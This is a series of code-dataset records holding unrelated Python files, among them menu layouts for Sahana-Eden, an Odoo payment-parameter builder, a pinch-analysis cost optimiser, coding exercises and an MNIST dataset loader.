for tweet in alltweets]\r\n\touttweets = [[tweet.text.encode(\"utf-8\")] for tweet in alltweets]\r\n\t\r\n\t#write the csv\t\r\n\twith open('%s_tweets.csv' % screen_name, 'w') as f:\r\n\t\twriter = csv.writer(f)\r\n\t\twriter.writerow([\"text\"])\r\n\t\twriter.writerows(outtweets)\r\n\t\r\n\tpass\r\n\r\n\r\nif __name__ == '__main__':\r\n\t#pass in the username of the account you want to download\r\n\tget_all_tweets(\"MrShen_\")\r\n\t#to_db(\"afbucker\")","sub_path":"tweetloader.py","file_name":"tweetloader.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278956913","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Sahana-Eden GUI Layouts (HTML Renderers)\n\n @copyright: 2012 (c) Sahana Software Foundation\n @license: MIT\n\n Permission is hereby granted, free of charge, to any person\n obtaining a copy of this software and associated documentation\n files (the \"Software\"), to deal in the Software without\n restriction, including without limitation the rights to use,\n copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the\n Software is furnished to do so, subject to the following\n conditions:\n\n The above copyright notice and this permission notice shall be\n included in all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n OTHER DEALINGS IN THE SOFTWARE.\n\n @status: work in progress\n @todo: - complete layout implementations\n - render \"selected\" (flag in item)\n - remove S3Menu\n\"\"\"\n\n__all__ = [\"S3LanguageMenuLayout\", \"ML\",\n \"S3PersonalMenuLayout\", \"MP\",\n \"S3MainMenuLayout\", \"MM\",\n \"S3OptionsMenuLayout\", \"M\",\n \"S3MenuSeparatorLayout\", \"SEP\",\n \"S3BreadcrumbsLayout\",\n \"homepage\"]\n\nfrom gluon import *\nfrom gluon.storage import Storage\nfrom ..s3 import *\n\n# =============================================================================\n\nclass S3MainMenuLayout(S3NavigationItem):\n \"\"\" Application Main Menu Layout \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n # The main menu\n items = item.render_components()\n return UL(items, _id=\"nav\")\n else:\n if item.components:\n # A submenu\n items = item.render_components()\n _class = item.selected and \"highlight\" or \"\"\n return LI(A(item.label, _href=item.url(), _class=_class),\n UL(items, _class=\"sub-menu\"))\n else:\n # A menu item\n if item.enabled and item.authorized:\n return LI(A(item.label, _href=item.url()))\n else:\n return None\n\n# -----------------------------------------------------------------------------\n# Shortcut\nMM = S3MainMenuLayout\n\n# =============================================================================\n\nclass S3OptionsMenuLayout(S3NavigationItem):\n \"\"\" Controller Options Menu Layout \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n # The menu itself\n items = item.render_components()\n return UL(items, _id=\"main-sub-menu\", _class=\"sub-menu\")\n else:\n if item.enabled and item.authorized:\n if 
item.components:\n _class = \"\"\n if item.parent.parent is None and item.selected:\n _class = \"highlight\"\n items = item.render_components()\n if items:\n items = LI(UL(items, _class=\"menu-extention\"))\n return [LI(A(item.label, _href=item.url(), _class=_class)), items]\n else:\n if item.parent.parent is None:\n _class = item.selected and \"highlight\" or \"\"\n else:\n _class = \" \"\n return LI(A(item.label, _href=item.url(), _class=_class))\n\n# -----------------------------------------------------------------------------\n# Shortcut\nM = S3OptionsMenuLayout\n\n# =========================================================================\n\nclass S3MenuSeparatorLayout(S3NavigationItem):\n \"\"\" Simple menu separator \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is not None:\n return LI(HR(), _class=\"menu_separator\")\n else:\n return None\n\n# -----------------------------------------------------------------------------\n# Shortcut\nSEP = S3MenuSeparatorLayout\n\n# =========================================================================\n\nclass S3BreadcrumbsLayout(S3NavigationItem):\n \"\"\" Breadcrumbs layout \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n items = item.render_components()\n return DIV(UL(items), _class='breadcrumbs')\n else:\n if item.is_last():\n _class = \"highlight\"\n else:\n _class = \"ancestor\"\n return LI(A(item.label, _href=item.url(), _class=_class))\n\n# =========================================================================\ndef homepage(module=None, *match, **attr):\n \"\"\"\n Shortcut for module homepage menu items using the MM layout,\n retrieves the module's nice name.\n\n @param module: the module's prefix (controller)\n @param match: additional prefixes\n @param attr: attributes for the navigation item\n \"\"\"\n\n settings = current.deployment_settings\n all_modules = settings.modules\n\n layout = S3MainMenuLayout\n\n if module is None:\n module = \"default\"\n if module in all_modules:\n m = all_modules[module]\n c = [module] + list(match)\n return layout(m.name_nice, c=c, f=\"index\", **attr)\n return None\n\n# =============================================================================\nclass S3Menu(DIV):\n \"\"\"\n MENU implementation -\n * breadcrumbs support\n * greater control / flexibility\n\n @author Abhishek Mishra\n @author Fran Boon\n\n @deprecated: retained here for reference\n \"\"\"\n\n # -------------------------------------------------------------------------\n def __init__(self, data, **args):\n self.data = data\n self.attributes = args\n\n # -------------------------------------------------------------------------\n def serialize(self, data, level=0):\n \"\"\"\n NOTE on right:\n personal-menu is the one on top right besides login,\n a presence of right in module level menu indicates a personal-menu\n\n nav is the big menu below the logo,\n an absence of right in module level menu indicates nav items\n\n main-sub-menu is the left side menu\n a right = True indicates a highlight here (set by 01_menu)\n\n extension are submenus under main-sub-menu\n a right = True indicates highlight here (set by 01_menu)\n \"\"\"\n _type = self.attributes[\"_type\"]\n if _type == \"personal-menu\":\n items = []\n data = [x for x in data if x[1]]\n for item in data:\n (name, link) = item[:2]\n items.append(LI(A(name,\n _href=link)\n )\n )\n\n deployment_settings = current.deployment_settings\n if deployment_settings.get_L10n_display_toolbar():\n menu_langs = self.attributes[\"_menu_langs\"]\n 
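                # build a language <select> preset to the active UI language; changing it auto-submits the form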
current_lang = current.T.accepted_language\n langopts = [ OPTION(x[0], _value=x[2]) for x in menu_langs[3] ]\n langselect = SELECT(langopts,\n _name=\"_language\",\n _title=\"Language Selection\",\n value=current_lang,\n _onchange=\"$('#personal-menu div form').submit();\"\n )\n langform = FORM(langselect,\n _name=\"_language\",\n _action=\"\",\n _method=\"get\")\n return DIV([UL(items), langform], _class=\"pmenu-wrapper\")\n else:\n return DIV(UL(items))\n elif _type == \"nav\":\n _highlight = \"\" or self.attributes[\"_highlight\"]\n items = []\n for item in data:\n (name, right, link) = item[:3]\n if not right:\n import re\n _link = link\n if \"default\" not in _highlight:\n _highlight = re.match(\"(.*/).*$\", _highlight).group(1)\n _link = re.match(\"(.*/).*$\", link).group(1)\n _class = \"highlight\" if str(_link) in _highlight else \" \"\n items.append(LI(\n A(name, _href=link, _class=_class)\n ))\n return UL(items, **self.attributes)\n elif _type == \"main-sub-menu\":\n items = []\n for item in data:\n (name, right, link) = item[:3]\n if link:\n # Lack of link => lack of permissions\n items.append(LI(A(name,\n _href=link,\n _class=\"highlight\" if right==True else \" \")\n )\n )\n if len(item) > 3:\n sub = item[3]\n append = S3Menu(sub,\n _type=\"extension\",\n _class=\"menu-extention\").serialize(sub)\n items.append(append)\n return UL(items, **self.attributes)\n elif _type == \"extension\":\n items = []\n for item in data:\n (name, right, link) = item[:3]\n if link:\n # Lack of link => lack of permissions\n items.append(LI(A(\"%s\" % name,\n _href=link,\n _class=\"highlight\" if right==True else \" \")\n )\n )\n return UL(items, **self.attributes)\n else:\n return UL()\n\n # -------------------------------------------------------------------------\n def xml(self):\n return self.serialize(self.data, 0).xml()\n\n# =============================================================================\n\nclass S3LanguageMenuLayout(S3NavigationItem):\n\n @staticmethod\n def layout(item):\n \"\"\" Language menu layout\n\n options for each entry:\n - lang_code: the language code\n - lang_name: the language name\n option for the menu\n - current_language: code of the current language\n \"\"\"\n\n if item.enabled:\n if item.components:\n # The language menu itself\n current_language = item.options.get(\"current_language\", None)\n items = item.render_components()\n select = SELECT(items, value=current_language,\n _name=\"_language\",\n _title=\"Language Selection\",\n _onchange=\"$('#personal-menu div form').submit();\")\n form = FORM(select, _name=\"_language\",\n _action=\"\",\n _method=\"get\")\n return form\n else:\n # A language entry\n return OPTION(item.option.lang_code,\n item.option.lang_name)\n else:\n return None\n\n # -------------------------------------------------------------------------\n def check_enabled(self):\n \"\"\" Check whether the language menu is enabled \"\"\"\n\n settings = current.deployment_settings\n\n if settings.get_L10n_display_toolbar():\n return True\n else:\n return False\n\n# -----------------------------------------------------------------------------\n# Shortcut\nML = S3LanguageMenuLayout\n\n# =============================================================================\n\nclass S3PersonalMenuLayout(S3NavigationItem):\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n # The menu\n items = item.render_components()\n if items:\n return DIV(UL(items), _class=\"pmenu-wrapper\")\n else:\n return \"\" # menu is empty\n else:\n # A menu item\n if 
item.enabled and item.authorized:\n                return LI(A(item.label, _href=item.url()))\n            else:\n                return None\n\n# -----------------------------------------------------------------------------\n# Shortcut\nMP = S3PersonalMenuLayout\n\n# END =========================================================================\n","sub_path":"modules/eden/layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":13094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426154522","text":"import textwrap\nimport codecs\n\n\ndef force_text(maybe_bytes):\n    if isinstance(maybe_bytes, bytes):\n        return codecs.decode(maybe_bytes, 'utf8')\n    return maybe_bytes\n\n\nDEFAULT_MESSAGE = \"An error occurred during execution\"\n\n\nclass SolcError(Exception):\n    message = \"An error occurred during execution\"\n\n    def __init__(self, command, return_code, stdout_data, stderr_data, message=None):\n        if message is not None:\n            self.message = message\n        self.command = command\n        self.return_code = return_code\n        self.stderr_data = force_text(stderr_data)\n        self.stdout_data = force_text(stdout_data)\n\n    def __str__(self):\n        return textwrap.dedent((\"\"\"\n        {s.message}\n        > command: `{command}`\n        > return code: `{s.return_code}`\n        > stderr:\n        {s.stderr_data}\n        > stdout:\n        {s.stdout_data}\n        \"\"\").format(\n            s=self,\n            command=' '.join(self.command),\n        )).strip()\n\n\nclass ContractsNotFound(SolcError):\n    message = \"No contracts found during compilation\"\n","sub_path":"solc/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"75206778","text":"'''\nfor sorting in main function\n'''\ndef take_second(elem):\n    return elem[1]\n\n'''\nmain function\n'''\nT = int(input())\nfor test_case in range(1, T + 1):\n    n = int(input()) \n\n    # n개의 경우에 대해 s, e 저장\n    se = []\n    for i in range(1, n+1):\n        s, e = map(int, input().split())\n        se.append([s, e])\n    \n    #sorting se; key: e, ascending order\n    se = sorted(se, key = take_second)\n\n    sum = 0 # 도크 쓸 수 있는 총 횟수\n    temp = se[0][1]\n    sum += 1\n    for i in range(1, n):\n        if se[i][0] >= temp:\n            temp = se[i][1]\n            sum += 1\n    \n    print('#%d %d' %(test_case, sum))","sub_path":"swexpert_PS/3 greedy alg/3-2.py","file_name":"3-2.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596608310","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields\nfrom collections import OrderedDict\n\nimport hashlib\nimport urllib\nimport execjs\n\n\nclass HisLongPayRecord(models.Model):\n\n    _name = 'his.long_pay_record'\n    _description = u'龙支付记录'\n\n    POSID = fields.Char('商户柜台代码')\n    BRANCHID = fields.Char('分行代码')\n    ORDERID = fields.Char('定单号')\n    PAYMENT = fields.Char('付款金额')\n    CURCODE = fields.Char('币种')\n    REMARK1 = fields.Char('备注一')\n    REMARK2 = fields.Char('备注二')\n    ACC_TYPE = fields.Char('账户类型')\n    SUCCESS = fields.Char('成功标志')\n    TYPE = fields.Char('接口类型')\n    REFERER = fields.Char('Referer信息')\n    CLIENTIP = fields.Char('客户端IP')\n    ACCDATE = fields.Char('系统记账日期')\n    USRMSG = fields.Char('支付账户信息')\n    INSTALLNUM = fields.Char('分期期数')\n    ERRMSG = fields.Char('错误信息')\n    USRINFO = fields.Char('客户加密信息')\n    DISCOUNT = fields.Char('优惠金额')\n    SIGN = fields.Char('数字签名')\n\n    is_refund = fields.Boolean('是否退款')\n    refund_time = fields.Datetime('退款时间')\n    refund_code = fields.Char('退款状态码')\n    refund_msg = fields.Char('退款返回信息')\n\n    order_ids = 
fields.Many2many('sale.order', 'long_pay_record_order_rel', 'record_id', 'order_id', '订单')\n\n company_id = fields.Many2one('res.company', '医院')\n internal_id = fields.Integer('内部ID')\n\n def get_pay_parameter(self, company, orders):\n \"\"\"获取支付参数\"\"\"\n def md5_encode(str):\n m = hashlib.md5()\n m.update(str)\n return m.hexdigest()\n\n if not orders:\n return\n\n amount_total = round(sum([order.amount_total for order in orders]), 2) # 订单总额\n attach = '|'.join([order.name for order in orders]) # 附加数据包\n pub = company.long_key[-30:]\n\n\n reginfo = '测试注册信息'\n proinfo = orders[0].order_line[0].product_id.name if orders[0].order_line else '未知'\n\n reginfo = execjs.eval(\"\"\"escape('%s')\"\"\" % reginfo)\n proinfo = execjs.eval(\"\"\"escape('%s')\"\"\" % proinfo)\n\n # 'MERCHANTID': company.long_mch_id, # 商户代码\n # 'POSID': company.long_counter_id, # 商户柜台代码\n # 'BRANCHID': company.long_branch_code, # 分行代码\n # 'ORDERID': orders[0].name, # 定单号\n # 'PAYMENT': orders[0].amount_total, # 付款金额\n # 'CURCODE': '01', # 币种\n # 'TXCODE': '520100', # 交易码\n # 'MAC': '', # MAC校验域\n # 'TYPE': '1', # 接口类型\n # 'PUB': '', # 公钥后30位\n # 'GATEWAY': 'UnionPay', # 网关类型\n\n # o = OrderedDict()\n # o['MERCHANTID'] = company.long_mch_id\n # o['POSID'] = company.long_counter_id\n # o['BRANCHID'] = company.long_branch_code\n # o['ORDERID'] = orders[0].name\n # o['PAYMENT'] = amount_total\n # o['CURCODE'] = '01'\n # o['TXCODE'] = '520100'\n # o['REMARK1'] = 'remark1'\n # o['REMARK2'] = 'remark2'\n # o['TYPE'] = '1'\n # o['PUB'] = pub\n # o['GATEWAY'] = 'test'\n # o['CLIENTIP'] = '127.0.0.1'\n # o['REGINFO'] = 'cs'\n # o['PROINFO'] = 'cs'\n # o['REFERER'] = '121.201.68.100'\n # o['THIRDAPPINFO'] = 'comccbpay' + company.long_mch_id + 'glekePay'\n #\n # o2 = OrderedDict()\n # o2['MERCHANTID'] = company.long_mch_id\n # o2['POSID'] = company.long_counter_id\n # o2['BRANCHID'] = company.long_branch_code\n # o2['ORDERID'] = orders[0].name\n # o2['PAYMENT'] = amount_total\n # o2['CURCODE'] = '01'\n # o2['TXCODE'] = '520100'\n # o2['REMARK1'] = 'remark1'\n # o2['REMARK2'] = 'remark2'\n # o2['TYPE'] = '1'\n # o2['GATEWAY'] = 'test'\n # o2['CLIENTIP'] = '127.0.0.1'\n # o2['REGINFO'] = 'cs'\n # o2['PROINFO'] = 'cs'\n # o2['REFERER'] = '121.201.68.100'\n # o2['THIRDAPPINFO'] = 'comccbpay' + company.long_mch_id + 'glekePay'\n #\n # parameter1 = urllib.urlencode(o) # 加密用\n # parameter2 = urllib.urlencode(o2) # 请求用\n\n\n parameter1 = \"MERCHANTID=\" + company.long_mch_id + \"&\" + \\\n \"POSID=\" + company.long_counter_id + \"&\" + \\\n \"BRANCHID=\" + company.long_branch_code + \"&\" + \\\n \"ORDERID=\" + orders[0].name + \"&\" + \\\n \"PAYMENT=\" + str(amount_total) + \"&\" + \\\n \"CURCODE=\" + '01' + \"&\" + \\\n \"TXCODE=\" + '520100' + \"&\" + \\\n \"REMARK1=\" + 'remark1' + \"&\" + \\\n \"REMARK2=\" + 'remark2' + \"&\" + \\\n \"TYPE=\" + '1' + \"&\" + \\\n \"PUB=\" + pub + \"&\" + \\\n \"GATEWAY=\" + 'test' + '&' + \\\n \"CLIENTIP=\" + '127.0.0.1' + '&' + \\\n \"REGINFO=\" + reginfo + '&' + \\\n \"PROINFO=\" + proinfo + '&' + \\\n \"REFERER=\" + '121.201.68.100' + '&' + \\\n \"THIRDAPPINFO=\" + 'comccbpay' + company.long_mch_id + 'glekePay'\n\n parameter2 = \"MERCHANTID=\" + company.long_mch_id + \"&\" + \\\n \"POSID=\" + company.long_counter_id + \"&\" + \\\n \"BRANCHID=\" + company.long_branch_code + \"&\" + \\\n \"ORDERID=\" + orders[0].name + \"&\" + \\\n \"PAYMENT=\" + str(amount_total) + \"&\" + \\\n \"CURCODE=\" + '01' + \"&\" + \\\n \"TXCODE=\" + '520100' + \"&\" + \\\n \"REMARK1=\" + 'remark1' + \"&\" + \\\n \"REMARK2=\" 
+ 'remark2' + \"&\" + \\\n \"TYPE=\" + '1' + \"&\" + \\\n \"GATEWAY=\" + 'test' + '&' + \\\n \"CLIENTIP=\" + '127.0.0.1' + '&' + \\\n \"REGINFO=\" + reginfo + '&' + \\\n \"PROINFO=\" + proinfo + '&' + \\\n \"REFERER=\" + '121.201.68.100' + '&' + \\\n \"THIRDAPPINFO=\" + 'comccbpay' + company.long_mch_id + 'glekePay'\n\n mac = md5_encode(parameter1) # 参数生成MAC\n\n parameter = parameter2 + \"&\" + \"MAC=\" + mac # 将生成的MAC拼接到原参数后面\n\n return parameter\n\n","sub_path":"shango_app/models/long_pay_record.py","file_name":"long_pay_record.py","file_ext":"py","file_size_in_byte":6327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"498272979","text":"import sys\nfrom problem_table import stream,problem_table\nfrom scipy import optimize\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nimport numpy as np\n\ndHvap = 2250.76\nCps = 1.895\nCpw = 4.20\nTf = 398-273\nTsat = 378-273\nTstart = 303-273\n\nstreams = []\nunstreamed_values = []\nprint(\"Inputs: \")\nwith open(sys.argv[1],'r') as file:\n\tfor line in file:\n\t\tvals = line.split(',')\n\t\tvals2 = [float(val) for val in vals]\n\t\tunstreamed_values.append(vals2)\n\ncapitals = []\nenergies = []\nsavings = []\n\n\ndef objective(dTmin):\n\tstreams = []\n\tfor val_set in unstreamed_values:\n\t\tnew_stream = stream(val_set[0],val_set[1],val_set[2],delta_T=dTmin)\n\t\tstreams.append(new_stream)\n\tpt = problem_table(streams) \n\tQc,Qh,pinch,deltaHs,intervalTemps = pt.calc_vals(gcc=True)\n\tenergy_cost = 300 * 3.6 * 10* (Qh+2832) #energy cost in $ 2832 is the KW from the unintegrated reboiler that must be considered\n\tcapital_cost = 12.5*10**6 / (dTmin**.05) #capital cost in $\n\tsaved_cost = saved(Qc,Qh,deltaHs,intervalTemps)\n\ttotal_cost = energy_cost + capital_cost - saved_cost\n\t#print(\"dtmin: {} Total cost: {} Saved Cost: {} Energy Cost: {}\".format(dTmin,total_cost,saved_cost,energy_cost))\n\tcapitals.append(capital_cost)\n\tenergies.append(energy_cost)\n\tsavings.append(saved_cost)\n\n\treturn total_cost\n\n\ndef steam_raising(Qc,Qh,deltaHs,intervalTemps):\n\n\tdef Hwater(T,H_start): #calculates the enthalpy of the water at a specific pt using eqs from paper\n\t\treturn H_start - Mw * Cpw * (T-Tstart) \n\n\tdef Hstart(Hwsat,Mw): #calculates starting enthalpy based on given vals\n\t\treturn Mw * Cpw * (Tsat-Tstart) + Hwsat\n\n\tdef Mw_calc(Hwsat):\n\t\treturn Hwsat / dHvap * (1-Cps * (Tf-Tsat) / (dHvap + Cps * (Tf-Tsat)))\n\n\tdef Hsteam(T,Mw):\n\t\treturn Mw * Cps * (Tf - T) \n\n\ttHpoints = []\n\ttHpoints.append((intervalTemps[0][0],Qh))\n\tcascade = Qh*10\n\tQc *= 10\n\tdeltaHs = [i*10 for i in deltaHs]\n\tfor i in range(len(intervalTemps)):\n\t\tcascade += deltaHs[i]\n\t\ttHpoints.append((intervalTemps[i][1],cascade))\n\n\n\ttopPt = []\n\tbotPt = []\n\tfor i in range(len(tHpoints)):\n\t\tif Tf >= tHpoints[i][0]:\n\t\t\ttopPt = i\n\t\t\tbreak\n\tfor i in range(len(tHpoints)-1,0,-1):\n\t\tif tHpoints[i][0] >= Tstart:\n\t\t\tbotPt = i\n\t\t\tbreak\n\n\trelevant_tH = tHpoints[topPt:botPt]\n\n\n\n\n\ttemps = [i[0] for i in tHpoints]\n\tenthalpies = [i[1] for i in tHpoints]\n\n\n\t# Hssat_init = Qc\n\t# Mw = 1 / Cps * Hssat_init / (Tf-Tsat)\n\t# Hwsat = dHvap * Mw + Hssat_init\n\tHwsat = Qc\n\tMw = Mw_calc(Hwsat)\n\t# print(\"hssat_init\",Hssat_init)\n\t# print(\"init of its\",Hwsat)\n\n\n\n\n\tdef gcc_crossed(Hwsat,Mw):\n\t\tH_start = Hstart(Hwsat,Mw)\n\t\tfor pt in relevant_tH:\n\t\t\tif Hwater(pt[0],H_start) > pt[1]:\n\t\t\t\treturn True\n\t\treturn False\n\n\n\twhile 
gcc_crossed(Hwsat,Mw):\n\t\tHwsat -= 1\n\t\tMw = Mw_calc(Hwsat)\n\t \n\tMw = Mw_calc(Hwsat)\n\tH_sr = Cpw * Mw * (Tsat-Tstart) + dHvap * Mw + Cps * Mw * (Tsat-Tstart)\n\n\tTpoints = np.linspace(Tstart,Tsat,100)\n\tH_start = Hstart(Hwsat,Mw_calc(Hwsat))\n\tHpoints = Hwater(Tpoints,H_start)\n\n\tTpointsSteam = np.linspace(Tsat,Tf,100)\n\tHpointsSteam = Hsteam(TpointsSteam,Mw)\n\n\tHtransition = np.linspace(Hpoints[-1],HpointsSteam[0],100)\n\tTtransition = [Tsat for i in range(100)]\n\n\t# plt.style('ggplot')\n\t# plt.annotate('Hwsat',xy=(Hwsat,105),xytext=(Hwsat+200,110), arrowprops=dict(facecolor='black',arrowstyle='-|>'))\n\t# plt.annotate('Hssat',xy=(HpointsSteam[0],105),xytext=(HpointsSteam[0],60), arrowprops=dict(facecolor='black',arrowstyle='-|>'))\n\t# plt.annotate('Hstart',xy=(H_start,30),xytext=(H_start-400,35), arrowprops=dict(facecolor='black',arrowstyle='-|>'))\n\n\n\t# plt.plot(enthalpies,temps)\n\t# plt.plot(Hpoints,Tpoints,'r')\n\t# plt.plot(HpointsSteam,TpointsSteam,'r')\n\t# plt.plot(Htransition,Ttransition,'r')\n\t# plt.xlabel(\"Enthalpy (kW)\")\n\t# plt.ylabel(\"Temperature (Celsius)\")\n\t# plt.show()\n\n\t# raise ValueError(\"Fuck my life\")\n\n\n\n\treturn H_sr,Mw\n\ndef saved(Qc,Qh,deltaHs,intervalTemps):\n\tH_sr,Mw = steam_raising(Qc,Qh,deltaHs,intervalTemps)\n\t#print(\"H_sr\",H_sr,\"Qc\",Qc*10,\"Qh\",Qh)\n\tWork_carnot = 21.141 * (1/44.01) * Mw / 1000 #j / mol * mol / kg * kg/s * kj / j\n\treturn (H_sr + Work_carnot) * 300 * 3.6\n\n\n\n\n\ndTmin_array = np.linspace(3,40,1000)\ncosts = []\nfor i in dTmin_array:\n\tcosts.append(objective(i))\n\nprint(\"Min Delta T: \",dTmin_array[costs.index(min(costs))], \"Min Cost: \", min(costs))\n\n\nplt.plot(dTmin_array,costs,label='total costs')\nplt.xlabel('Delta T Min (K)')\nplt.ylabel('Total Cost (* 10 mil $)')\nplt.title('Effect of Delta T Min on total cost',y=1.08)\nplt.savefig('overall_total_cost_with_steam_raising_total_only.jpg')\nplt.show()\n\n\n\n\n","sub_path":"problem_table/problem_table/overall_minimization.py","file_name":"overall_minimization.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519838935","text":"\"\"\"\n给定两个没有重复元素的数组 nums1 和 nums2 ,其中nums1 是 nums2 的子集。找到 nums1 中每个元素在 nums2 中的下一个比其大的值。\n\nnums1 中数字 x 的下一个更大元素是指 x 在 nums2 中对应位置的右边的第一个比 x 大的元素。如果不存在,对应位置输出-1。\n\n示例 1:\n\n输入: nums1 = [4,1,2], nums2 = [1,3,4,2].\n输出: [-1,3,-1]\n解释:\n 对于num1中的数字4,你无法在第二个数组中找到下一个更大的数字,因此输出 -1。\n 对于num1中的数字1,第二个数组中数字1右边的下一个较大数字是 3。\n 对于num1中的数字2,第二个数组中没有下一个更大的数字,因此输出 -1。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/next-greater-element-i\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nclass Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n L = []\n for i in nums1:\n index_i = nums2.index(i)\n if index_i < len(nums2)-1:\n if max(nums2[index_i+1:]) < i:\n L.append(-1)\n else:\n while nums2[index_i+1]\nalpha bravo charlie delta\n10 20 30 40\n<출력>\n{'alpha': 10, 'bravo': 20}\n\n<입력 예>\nalpha bravo charlie delta echo foxtrot golf\n30 40 50 60 70 80 90\n<출력>\n{'bravo': 40, 'charlie': 50, 'echo': 70, 'foxtrot': 80, 'golf': 90}\n'''\n\nkeys = input().split()\nvalues = map(int, input().split())\n \nx = dict(zip(keys, values))\n\nx = {key: value for key, value in x.items() if key != 'delta'}\nx = {key: value for key, value in x.items() if value != 
30}\n\nprint(x)\n","sub_path":"9_judge_dict_del.py","file_name":"9_judge_dict_del.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628494515","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 16 17:31:55 2017\nПринадлежит ли точка квадрату - 1\n@author: doug\n\"\"\"\nimport math\n\n\ndef IsPointInSquare(x, y):\n    \"\"\" is point in square \"\"\"\n    x1 = abs(x)\n    y1 = abs(y)\n    return (abs(x) <= 1) and (abs(y) <= 1)\n\nxIn = float(input())\nyIn = float(input())\nif (IsPointInSquare(xIn, yIn)):\n    print(\"YES\")\nelse:\n    print(\"NO\")\n","sub_path":"Week4-Функции и рекурсия/Принадлежит_ли_точка_квадрату1_IsPointInSquare.py","file_name":"Принадлежит_ли_точка_квадрату1_IsPointInSquare.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615815936","text":"import cv2\nimport torchvision\nimport numpy as np\n\ncv2.setNumThreads(0)\ncv2.ocl.setUseOpenCL(False)\n\n\nclass MNISTSearchDataset(torchvision.datasets.MNIST):\n    def __init__(self, root=\"~/data/mnist\", train=True, download=True, transform=None):\n        super().__init__(root=root, train=train, download=download, transform=transform)\n\n    def __getitem__(self, index):\n        image, label = self.data[index], self.targets[index]\n\n        if self.transform is not None:\n            im_3d = np.repeat(image[:, :, np.newaxis], 3, 2)\n            transformed = self.transform(image=im_3d.numpy())\n            image = transformed[\"image\"]\n\n        return image, label\n","sub_path":"examples/MNIST/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146316998","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2017 D. 
de Vries\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis file contains all the XPaths and utility string constants used by the dAEDalus disciplines.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nsigma_names = ['sigma_fs', 'sigma_rs', 'sigma_ts', 'sigma_bs']\n\n\"\"\" CPACS \"\"\"\nx_vehicles = '/cpacs/vehicles'\nx_model = x_vehicles + '/aircraft/model[@uID=\"model\"]'\nx_ref = '/'.join([x_model, 'reference'])\nx_wing = '/'.join([x_model, 'wings/wing[@symmetry=\"x-z-plane\"][@uID=\"wing\"]'])\nx_sec = '/'.join([x_wing, 'sections/section[@uID=\"sec_%d\"]'])\nx_elem = '/'.join([x_sec, 'elements/element[@uID=\"elem_%d\"]'])\nx_mbd = '/'.join([x_model, 'analyses/massBreakdown'])\nx_global = '/'.join([x_model, 'global'])\nx_perf = '/'.join([x_global, 'performanceTargets'])\n\nx_ref_area = '/'.join([x_ref, 'area'])\nx_ref_length = '/'.join([x_ref, 'length'])\nx_compseg = '/'.join([x_wing, 'componentSegments/componentSegment[@uID=\"compSeg_%d\"]'])\nx_struct = '/'.join([x_compseg, 'structure'])\nx_sparposs = '/'.join([x_struct, 'spars/sparPositions'])\nx_fs_r_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"fs_%d_r\"]/xsi'])\nx_fs_t_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"fs_%d_t\"]/xsi'])\nx_rs_r_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"rs_%d_r\"]/xsi'])\nx_rs_t_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"rs_%d_t\"]/xsi'])\nx_sparsegs = '/'.join([x_struct, 'spars/sparSegments'])\nx_fs_web_t = '/'.join([x_sparsegs, 